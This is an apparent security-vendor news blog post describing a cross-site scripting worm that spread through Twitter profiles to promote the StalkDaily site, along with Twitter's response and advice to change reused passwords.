Thousands of Twitter users are warning each other about what appears to be a fast-moving attack affecting the system.
Affected Twitter profiles appear to be directing unsuspecting users to the website stalkdaily.com. (Please do not visit this site)
(Enjoy this video? You can check out more on the SophosLabs YouTube channel and subscribe if you like)
(Some notes about the video above. Yes, I do make a mistake in the video as it’s actually the 12th of April today not the 11th. Sorry about that. I’ve also posted the video on YouTube).
Curiously, a lot of Twitter users appear to be posting status updates all containing phrases such as :
Dude, www.StalkDaily.com is awesome. What's the fuss?
Virus!? What? www.StalkDaily.com is legit!
That last one is particularly sneaky, as it appears to try and discredit the genuine warnings that have been spreading through the micro-blogging site.
Ironically, some Twitter users have compounded the problem by posting warning messages about the StalkDaily website on the network, giving a live link to the suspicious website in the process.
Twitter has responded by shutting down the @StalkDaily profile, claiming it has shown suspicious activity, and has reset passwords of Twitter users who it believes have been hit.
If you believe you may have been affected by this latest attack, don’t just change your Twitter password – make sure you change your credentials on any other site where you may have been using the same password.
Of course, this isn’t the first time that Twitter users have suffered an attack. Last month, fans of the popular micro-blogging site, were barraged with messages being sent from compromised accounts trying to drive traffic to a pornographic website called ChatWebCamFree.
We’ll post more information as it becomes available. Obviously, in the meantime, it would be wise not to click on any links directing you to StalkDaily.com.
Some more information is beginning to emerge about the attack.
The hackers behind the attack planted an additional script into users’ profiles alongside the StalkDaily link, meaning that you could become infected just by viewing an infected users’ details.
You can read more about this in this blog entry by Damon Cortesi.
For their part, Twitter has confirmed that what occurred was a cross-site scripting (XSS) attack, spreading links across the system without users’ consent. The site has reassured users that they have taken steps to close the holes that allowed the worm to spread, and that “no passwords, phone numbers, or other sensitive information were compromised” as part of the attack.
In the latest development it is being reported that a 17-year-old man called Mikeyy Mooney has claimed responsibility for the attack.
Although StalkDaily originally denied any involvement in the attack with a statement on their website, this was later replaced with an admission that a newspaper interview with worm creator Mikeyy Mooney was genuine.